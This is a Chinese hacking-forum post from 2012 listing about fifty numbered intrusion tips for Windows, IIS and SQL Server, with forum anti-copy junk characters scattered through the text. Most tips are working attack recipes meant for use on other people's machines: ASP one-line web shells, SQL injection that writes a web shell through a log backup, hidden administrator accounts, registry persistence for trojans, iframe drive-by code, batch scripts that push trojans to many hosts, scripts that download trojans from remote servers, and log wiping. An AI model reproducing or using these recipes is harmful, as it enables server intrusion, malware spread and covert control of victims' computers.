找回密码
 立即注册
查看: 2682|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
8 j: Z8 D1 o" o4 ~. d( b6 w, ]- y1 I8 ecacls C:\windows\system32 /G hqw20:R: ^& \; e/ l4 @7 w. B
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
! i* |# g. g0 m5 G# Z" W恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
% ^! c# h5 T/ ^  D" ^" i$ f6 f, K' J. A% G% N4 a; V
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。( W" t- ~" I; V6 `- Z4 w( l

9 h% l. V3 T% K3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。4 ~0 Q! r' C$ e
* ]8 a3 H2 N# U% t3 O
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
9 T. q( f; m6 ~) D* P: w& ?, N- X! f- j+ ]
5、利用INF文件来修改注册表8 z' I$ e( Z1 b) B; u$ Z
[Version]
/ A* f* Z+ L: j3 q6 KSignature="$CHICAGO$"1 j" [7 `) a6 L
[Defaultinstall]
4 c) a( V4 M9 I3 x% p4 E+ N- UaddREG=Ating/ |4 |& x! y1 v" R1 U
[Ating]
, J/ n) o& Y) m! J" WHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"" c/ [* Y% x7 F: R) D/ D/ I9 a5 U2 I1 Z4 v
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
( d' x" @8 s" @9 A/ |; Zrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径6 d' _6 Z& ]$ w6 L
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU- h# e( n0 c. v; F' a* W
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
3 ]9 W& W" V& Z) xHKEY_CURRENT_CONFIG 简写为 HKCC4 a' C( E: |1 R2 A
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
4 V' g1 _( k0 x/ {"1"这里代表是写入或删除注册表键值中的具体数据
0 {2 b9 X; g& D  C) z* C
3 [4 D7 Z$ d7 y/ M1 Z% I- ^6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,) I8 k$ _% Q0 I) b5 P* w5 F
多了一步就是在防火墙里添加个端口,然后导出其键值. {! e$ a8 t" t0 J: x% f+ V
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
, @6 j6 @* \1 i! d- K/ k  [. p& q
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
" M# d( M+ W1 A2 D在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。5 B- }% x: f+ A; j( ^& k
' i$ @; f' h* |: A" x8 `
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。* {( w" B/ i6 v+ u! P

) Y  P4 A5 e* d9 ?& I9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
- [! ?  a: M, W7 h5 U可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
- t3 j9 J9 L( x% u' _8 d
0 d- o) F& p2 o10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
) ]$ C, g, ]1 r. I
# z1 \+ J5 \/ z/ B+ O11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,( k- [/ [, p1 Y. J7 O# b; j' l
用法:xsniff –pass –hide –log pass.txt6 [+ w: d3 Q1 \0 ]3 O: I
5 [. M8 w/ _! t" p* Y$ K7 O9 k
12、google搜索的艺术8 p1 B+ l4 o% v2 p, U0 l$ k
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
$ E6 v9 [3 ?+ J9 p或“字符串的语法错误”可以找到很多sql注入漏洞。
3 m3 @0 S8 z7 [8 ^  _
( @  h9 W  j0 j- k8 ?0 F13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
5 r2 v  X. {- D' t/ o) z5 O" S9 u7 n: ^) l* G# K. I$ L" z
14、cmd中输入 nc –vv –l –p 1987
4 k, o$ Z2 o: e& H" ]6 F做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃! r1 Y7 ]6 w& _" s
0 U, ^2 B, E6 {5 A+ t, n! i' w
15、制作T++木马,先写个ating.hta文件,内容为
& c% c& B3 o- b0 }0 N- r0 J1 K9 z0 G<script language="VBScript">& e: f2 h$ R/ F7 \
set wshshell=createobject ("wscript.shell" )7 Y) t8 b2 J  K9 Y; c
a=wshshell.run("你马的名称",1)- g. s/ P4 R2 Z1 D
window.close( B& w; g3 m6 e& f$ t8 d" X1 |
</script>/ i+ ^+ J9 a# V2 l$ f
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。7 }9 q2 h. H) Q0 `8 ?% w# _+ n& |! @
/ m, |' A/ g: q7 f7 l
16、搜索栏里输入2 r, b" a8 M5 M1 b6 l
关键字%'and 1=1 and '%'='
1 @7 z5 f3 z2 F3 J5 E6 n6 x关键字%'and 1=2 and '%'='
" V, t; V- ?. ~, b1 }6 M3 W* b比较不同处 可以作为注入的特征字符8 V/ s; Q0 A( G3 x: S/ O+ d3 n$ K

# r. D  c- @- k  a6 A17、挂马代码<html>
+ T4 o, @/ \! ~3 R<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
! S6 t/ a  Z5 n' i2 E- g</html>- k( o% q7 ~9 d: |/ _! a& \

8 c0 D- p8 _4 P# x) Z18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
9 z% F2 ^- ?' @/ }( y, [* S8 Onet localgroup administrators还是可以看出Guest是管理员来。$ ]- R1 c) Q+ U5 m* ~# ?
$ B& I$ m9 K$ {1 J
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等" |) W$ c7 m3 i
用法: 安装: instsrv.exe 服务名称 路径
3 f, K9 D  H! z8 ?$ K/ M卸载: instsrv.exe 服务名称 REMOVE
* l' W4 ~1 J% }1 n/ t' A$ ~) w6 {( ^! _" X4 F4 V
+ i8 A4 l$ t6 `" I5 i( k" f) y( k
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
1 }! \  o* V1 j1 P& s% c不能注入时要第一时间想到%5c暴库。( K" }+ ^# W) v2 ~

8 q4 X: F+ c: R7 S( h8 E22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
" M$ q" D* f% i. u
; @" \9 ]  T; X; `3 l5 h7 i6 }& h23、缺少xp_cmdshell时
4 [2 d) ^' u) }; S7 q, d  Z# Y尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
  A) ]- S3 t+ k$ ^! I/ x& T假如恢复不成功,可以尝试直接加用户(针对开3389的)
& c4 I6 P5 }$ |- bdeclare @o int
0 A- q5 x8 _; Z& X! t) ^! c/ Wexec sp_oacreate 'wscript.shell',@o out
1 o6 T2 f0 U( j4 N$ s9 Nexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
$ t: ~% a" L, X4 M" k
( [- N9 Y+ l7 U* M$ |24.批量种植木马.bat
8 l+ q6 I" T' [* n- j, Kfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中: o4 n  G6 i; U9 Q, T" H- F
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间8 K" ^3 v) u5 X9 @& O
扫描地址.txt里每个主机名一行 用\\开头
) V/ ~, e, [* \! {+ z3 H0 k
& F0 g" E! S/ c1 m! b2 }25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
/ C  z; s# K+ u( Z( L7 M) Z) q4 X1 c7 p% m, X. I) N+ \
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.$ q( B; E: r2 a. N/ L/ U
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.. `* c" W+ I# u2 @+ n
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
% }6 {4 y" [5 `5 F& m/ p9 e! O, h2 s) k6 s0 C
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP1 ~4 _, a) W& O: S: d
然后用#clear logg和#clear line vty *删除日志
# D9 y4 H# _9 D8 d" s. T) r8 }# E" c1 [. j7 f/ `
28、电脑坏了省去重新安装系统的方法
0 V* K- S) v6 f5 Z5 y3 H纯dos下执行,
2 n6 J* T5 \* i, C/ Lxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config# X& ?( f% ~' i4 A9 K8 U
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config' Z& V2 _9 Y9 l# F! K8 u" e

: [3 V+ ~! s5 p6 f; {  A1 j29、解决TCP/IP筛选 在注册表里有三处,分别是:
% F8 [4 z- u" D" w4 a" oHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
+ _- _7 m: j& q9 O  GHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) i- h* e# ^# H3 @4 R7 wHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
! r2 e- V) v" y分别用; d; f. l6 r/ _
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip& C% E- G  X( f
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- C: b$ `. q. d6 j5 ?  j. ?- _( _: iregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip8 b) b$ h, {$ {3 v+ p7 n- L
命令来导出注册表项/ }7 S9 q: s' b! b+ \6 X! F
然后把三个文件里的EnableSecurityFilters"=dword:00000001,/ A  Z/ L! e7 p1 d9 j
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
' z" d3 _3 I9 h8 Cregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。2 |: U$ {; f# u0 R% [: q! O
! }& \' p3 e8 c. W- N- Y5 T
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
: U( e! ^2 e7 r+ _/ ASER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3, N% k$ _: I5 v

1 _7 W3 J' i' u8 T. P8 `31、全手工打造开3389工具% D  N! ~( {, y% N
打开记事本,编辑内容如下:
* o! E* p, M7 [. f6 A: S0 L& b3 }+ Secho [Components] > c:\sql) E( G% P. |+ M+ C8 M
echo TSEnable = on >> c:\sql6 ?) y8 r/ e1 A& C" S8 ?
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q8 |! q! l) Q1 C( a9 C* L# ?
编辑好后存为BAT文件,上传至肉鸡,执行
. f. l# P2 J8 s! {: c- V- d
4 S8 U( m' e  }) L32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马! \6 t- y* ?# |8 L& n
2 g; |# h0 W* u2 L# |9 t- g
33、让服务器重启( O8 M; U4 o+ E
写个bat死循环:3 z7 q) p: _5 x" l
@echo off* c' k) P2 E/ F- e3 E. |# X$ D' n
:loop1) i3 b- Z+ _& o$ k& D5 y
cls& j& I# Y: I' {/ q9 J$ m/ {& B
start cmd.exe. A% N( ^  d$ t1 V' C  |& [. [
goto loop1% m  o& ~: @( J# f5 K
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启2 Y) U) b/ c: D/ L& z" e9 Q! v
' K5 l5 X1 l! K! z7 I: i
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,8 h* O* N6 s; {3 S- h' S* z! l
@echo off
+ _" o! f4 H: t9 b; i/ n* e3 bdate /t >c:/3389.txt! }- G7 l& q' _: K7 t! O, j2 V7 R
time /t >>c:/3389.txt9 w$ a0 h: w  V* q5 i
attrib +s +h c:/3389.bat# N6 c: t2 S6 ]: Y% o0 z- |: m
attrib +s +h c:/3389.txt
" s. c; \+ ]3 a! r2 U8 cnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
1 B# z( N7 N$ w' \, u. N$ B并保存为3389.bat
8 ~/ B) c9 E5 V8 v/ d7 w) X打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
/ T. _" W$ n' d* N8 k1 L; a* Y8 @" Y# K) H1 f3 L- V
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
" \; m- A" X6 T! B& Z# M5 Kstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
& R" N( [. a$ X4 {3 z输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
% _& ~2 P# o$ n2 w/ y
5 E8 {+ J  I2 x- U2 P' }36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
$ {5 ^0 V0 n0 U! j7 l" T1 Oecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
3 \" X- }6 C: F1 s0 decho 你的FTP账号 >>c:\1.bat //输入账号
2 _2 B) D+ ~: ^" [; oecho 你的FTP密码 >>c:\1.bat //输入密码
5 P1 }9 C1 d' H; N- Secho bin >>c:\1.bat //登入
. D5 F; W1 E& M, {# u$ H  L) jecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么9 y' |& e- r2 ^6 s; Y1 @4 N/ s0 ~
echo bye >>c:\1.bat //退出! U" G' r, |2 C  u
然后执行ftp -s:c:\1.bat即可
/ U$ H$ q& L' z. }# e% a
! ~" f6 l9 }5 J6 P8 E! ]  W37、修改注册表开3389两法8 K3 x( N6 C5 [" X$ R: c
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表& H3 b: ?; G8 `# r( z
echo Windows Registry Editor Version 5.00 >>3389.reg" |: Z; t5 V( s3 Z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg+ |* z  K4 S0 `
echo "Enabled"="0" >>3389.reg
4 t4 B5 Q5 V. W# Yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
1 s6 `& {& L/ u" f5 M9 @NT\CurrentVersion\Winlogon] >>3389.reg
2 o" y- n- k0 C1 l% z% Q  recho "ShutdownWithoutLogon"="0" >>3389.reg
1 Q, [& n$ p5 E7 u: c% j; W9 ?echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
  c5 S3 T2 P0 Z! n$ C; w% w- g>>3389.reg1 A, _4 i' T& C" N% m$ ~! S
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg7 F4 R% ?+ t% @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]) r  J2 K6 v% r
>>3389.reg
! H+ }4 c+ h9 z4 u9 Lecho "TSEnabled"=dword:00000001 >>3389.reg
3 Z4 I" V+ F% I: B8 w. ?! c* @* kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg! Z0 }% j9 x% L2 B& s
echo "Start"=dword:00000002 >>3389.reg# G" Q2 c; H$ _8 k& k$ B
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]8 H  f# J; }5 I
>>3389.reg" p2 u- Q+ \: J( }  m* A% {" z
echo "Start"=dword:00000002 >>3389.reg" z7 @: c- S% ^: m
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
- D0 E& \0 T9 g' d. aecho "Hotkey"="1" >>3389.reg
' }/ t, M# T% @6 k0 Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* ~3 B7 R/ Q# I1 d2 ^: @Server\Wds\rdpwd\Tds\tcp] >>3389.reg+ C% C: m3 i4 t- A  z6 b5 M
echo "PortNumber"=dword:00000D3D >>3389.reg+ ^" O# u9 ~' e& T! V/ a( w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- Z; ]* N. o' `5 j! M+ u6 R" xServer\WinStations\RDP-Tcp] >>3389.reg8 g$ b2 n& H$ |# N- _: _. B  i0 ~. C
echo "PortNumber"=dword:00000D3D >>3389.reg
& ~9 |% R& u. ?2 ]7 l把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。; S6 y$ U; A) s0 a% e( Z3 F
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)/ K2 {% Q5 ]1 L7 V) l& L
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
( H; v6 O7 h$ }! }(2)winxp和win2003终端开启( u  y# f$ H( T+ a: W; O
用以下ECHO代码写一个REG文件:
7 I2 ?" I" `: f5 V, _4 Vecho Windows Registry Editor Version 5.00>>3389.reg; Q  T, B1 A2 g" G! F. {6 c/ S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ B- X% l/ E# o! f8 R
Server]>>3389.reg3 p, L" D2 q  L& p1 m
echo "fDenyTSConnections"=dword:00000000>>3389.reg
$ H8 p! z/ g7 e' V3 gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' t) j' U) i3 g3 k3 _
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
: u: [. b9 t0 S7 I) P& Cecho "PortNumber"=dword:00000d3d>>3389.reg. Y0 q8 h  w( ^" G8 X' B" e' F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& W$ A( a8 l- F7 ]. w+ g4 t& [) G4 hServer\WinStations\RDP-Tcp]>>3389.reg
& \, j5 q# g# i8 \, @echo "PortNumber"=dword:00000d3d>>3389.reg
9 F1 E3 @5 k3 _然后regedit /s 3389.reg del 3389.reg
1 u3 a+ p9 u, y9 {: C2 r0 BXP下不论开终端还是改终端端口都不需重启
1 c7 r. x) s- A
; f$ h) }) o" a5 C9 l% V38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
4 e7 B9 |) `8 ?用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'1 s, x8 B. D# }5 J* t; K2 ]6 A

# u# T  }! W( `- c& G4 `39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
1 @! \/ j) o4 `; P) a(1)数据库文件名应复杂并要有特殊字符6 w/ M! r/ T& v& f; D6 Q
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源- y6 `3 k8 |+ I0 l" G
将conn.asp文档中的
$ k  G) L) a$ MDBPath = Server.MapPath("数据库.mdb")
' k4 a# s9 I% q' iconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
  X9 ]- m2 }! d# }
4 T3 n4 F% W) B9 f' q* n5 o修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置# ^, G" W% k6 J8 T& Q" q& _
(3)不放在WEB目录里
' g  I( D( f! d- Z8 f9 ^4 l# h
+ I% Q7 R! B5 A  p8 O# i40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉4 J' t$ `  x8 v1 P
可以写两个bat文件
$ L" L; `- s% b( u) g! O' d- I2 q@echo off( J+ T& ~, h3 }# q
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe, t3 m. [% d% a) U
@del c:\winnt\system32\query.exe
( X2 `. t! @4 G2 G) L@del %SYSTEMROOT%\system32\dllcache\query.exe
3 S2 T' ?! L2 A3 Q) J6 Y@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的2 Q6 F, w, p, I/ k% _& n: R

6 j- S8 a% N2 C/ B  J@echo off7 E  B2 Z) T1 {4 _
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe- q# w4 N1 J0 m0 c/ ?
@del c:\winnt\system32\tsadmin.exe
# E- {: y% p! c5 {. [@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex# |. f  h) }; l* T' r  t: z7 N

' E9 [# ?& i7 q$ t5 R+ {# C41、映射对方盘符
, j* j% m$ C7 S' U5 Mtelnet到他的机器上," U& a; R* Q  L( u% v8 v8 O
net share 查看有没有默认共享 如果没有,那么就接着运行
9 e, z; ^7 k9 d, Z, Snet share c$=c:3 O6 m( t& `+ I
net share现在有c$
3 \' @* P" a, H9 y6 D在自己的机器上运行
9 g" y# H* |9 `& g8 _# inet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
) C# i4 _; Q8 _. A! B. x0 s) {- F0 f, Y3 L0 b
42、一些很有用的老知识
! \& w) X+ @. [/ W: @type c:\boot.ini ( 查看系统版本 )
' |+ v- n; \, a9 x+ _+ w8 V* m  {net start (查看已经启动的服务)
/ S0 c4 e& c" {/ [! V$ dquery user ( 查看当前终端连接 )3 Q  z5 _0 T4 Z5 G3 U) u2 E
net user ( 查看当前用户 )
, S6 `& a" @$ h+ rnet user 用户 密码/add ( 建立账号 )
, B) c( R+ k7 M, \( d( S5 Nnet localgroup administrators 用户 /add (提升某用户为管理员)
8 m2 [. L( |% }- z4 mipconfig -all ( 查看IP什么的 )/ u5 Y! Q7 |* s) W: g. u6 Z
netstat -an ( 查看当前网络状态 )/ `' g# t4 ^% O0 p4 ~8 U6 }# s
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
9 `% R. S7 J( M# i* j' r5 |5 N: W) p克隆时Administrator对应1F4, V3 P# ^7 i# v5 u! ~( X7 M& H+ R
guest对应1F5
6 i4 S: T) o9 e- Otsinternetuser对应3E8
  G2 p0 C! f) `# ?+ t( u, z% n% f: ]; V7 V2 v3 E+ [  g
43、如果对方没开3389,但是装了Remote Administrator Service8 ?  Y5 P( I" @* V4 b" L
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
: x& i  E1 O; `解释:用serv-u漏洞导入自己配制好的radmin的注册表信息  p3 `- L' p1 w3 b
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
1 i% F" ?4 [$ ~* S9 g, ]
1 ^! k: ?5 J0 J7 j  r: l! M44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
0 ?( E! Q/ p* P* {; R8 y0 K/ u; K本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
" n! B8 L: y/ y5 p' U1 g- I3 p: q1 ]9 K2 Y1 P
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)) U; a1 \1 a8 R
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open" L( F4 k% |$ s/ S* V& o+ e8 ^
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
  a3 x4 U2 s7 x) S! S- gCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
  Z+ C& i' d6 R1 x7 V$ e1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs  w6 U! i" l8 G4 h  g# N& z
(这是完整的一句话,其中没有换行符)
! t: P, b* {: Y+ \5 p9 }; @2 ?然后下载:- [! p* p0 a. }1 a3 S& v
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
/ R: D% N+ {3 L: y2 U' B* H0 a" u3 G6 D  a7 n: D9 w
46、一句话木马成功依赖于两个条件:
5 _3 s8 x8 [9 w* u7 }* a7 q4 c1、服务端没有禁止adodb.Stream或FSO组件
' @/ o) _7 ^5 s6 [2 S2 N2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
& [3 _# }* _9 n, e3 y& X' h+ O
2 U* c3 a" J$ F7 I: b' @47、利用DB_OWNER权限进行手工备份一句话木马的代码:
1 i' K  B4 N4 d( m$ l;alter database utsz set RECOVERY FULL--
( E* o, _2 l2 G0 S;create table cmd (a image)--
1 a" v& l) V7 \0 r' X8 F: D;backup log utsz to disk = 'D:\cmd' with init--, _# f& j3 y, [! O) ~/ D: d
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--) g. F/ G9 b. S) W4 m
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
; `! B& |9 k* M4 M. S5 f注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
! T* |7 }# t6 B1 E+ |8 e8 y
$ N2 m9 p, g  ^  A; u7 B7 l2 P& r* `48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:+ N9 M- b( }( ^- `, H
  W, j5 Q  c; _! c3 `
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options4 O! K8 l2 [$ P- e- ?6 N
所有会话用 'all'。9 p: |- L. |+ v6 U: C0 A
-s sessionid 列出会话的信息。) [6 j' i% z# B. g1 ?" {- y
-k sessionid 终止会话。
( [1 q* Y9 ?  `4 c/ y3 b. Y-m sessionid 发送消息到会话。: v+ M( W0 J( m1 c: e
9 ]2 O% s1 p& W8 R5 y# K
config 配置 telnet 服务器参数。
; w6 c  Y8 R5 ~
# ~; o/ R4 ~( G: m+ a% o" xcommon_options 为:+ d5 ^( g% T& x
-u user 指定要使用其凭据的用户
+ z" y/ X2 s  K4 _8 k- {/ |-p password 用户密码2 a4 W2 F- @9 Y1 m6 Y5 V
9 h6 C# p: z# L
config_options 为:
$ G/ g2 @. o* K  Idom = domain 设定用户的默认域
' p% `* E; c$ b% y" z) xctrlakeymap = yes|no 设定 ALT 键的映射
" R6 K, Q& U: y) Z: D# V# ktimeout = hh:mm:ss 设定空闲会话超时值! @9 }5 k. ?( E2 ^& L: F' T' {
timeoutactive = yes|no 启用空闲会话。  `4 g2 U( ~: l/ }: ^
maxfail = attempts 设定断开前失败的登录企图数。
& Y& Q' E& _3 G  A' [# s4 tmaxconn = connections 设定最大连接数。1 V, i" `6 T( j$ s7 |
port = number 设定 telnet 端口。# r' C, k6 ]1 O
sec = [+/-]NTLM [+/-]passwd
$ Y2 V- z$ q5 ]& d3 Z设定身份验证机构* s' _7 \1 K9 b3 @# u
fname = file 指定审计文件名。
2 q8 J) ?0 M9 w% }% `fsize = size 指定审计文件的最大尺寸(MB)。4 I! N3 b# Q/ d% w$ d
mode = console|stream 指定操作模式。
/ n* ~4 S0 y; T# q2 k; m6 B; l/ k: Fauditlocation = eventlog|file|both
) n/ m' y, B' T8 ]  Q. `# F) R指定记录地点5 c" h, Y6 c7 K4 w% z1 o* q4 O0 r
audit = [+/-]user [+/-]fail [+/-]admin" f" [8 e! G3 ]0 r% V* D
- y  T$ ^9 s: f1 b. ^1 p4 ^
49、例如:在IE上访问:: E8 l; [1 [* [( e! v
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/" W2 |0 t$ u! A5 z, a; S* Y
hack.txt里面的代码是:
+ p% X8 N) j* f8 j$ U2 A( Y<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
4 A8 u. ^( W9 U3 ?2 N把这个hack.txt发到你空间就可以了!6 c) O+ |& _4 I9 u: J. I' O
这个可以利用来做网马哦!
" X  w4 Y* A0 M6 z3 [! X/ h8 w; n5 G% W
50、autorun的病毒可以通过手动限制!$ X8 I- y4 G% Z4 l2 }4 s6 E1 L
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!, q' K- e+ P* J* D- w
2,打开盘符用右键打开!切忌双击盘符~
! O0 A; s& V$ @" U3 @" |3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
& J7 A1 P' S- w' v' _, k# d4 z1 r
51、log备份时的一句话木马:
8 v% R% U* k2 t& i, L" ?a).<%%25Execute(request("go"))%%25>( G$ q! s* p4 ?
b).<%Execute(request("go"))%>
* b& N# T5 ?0 p$ _( Lc).%><%execute request("go")%><%
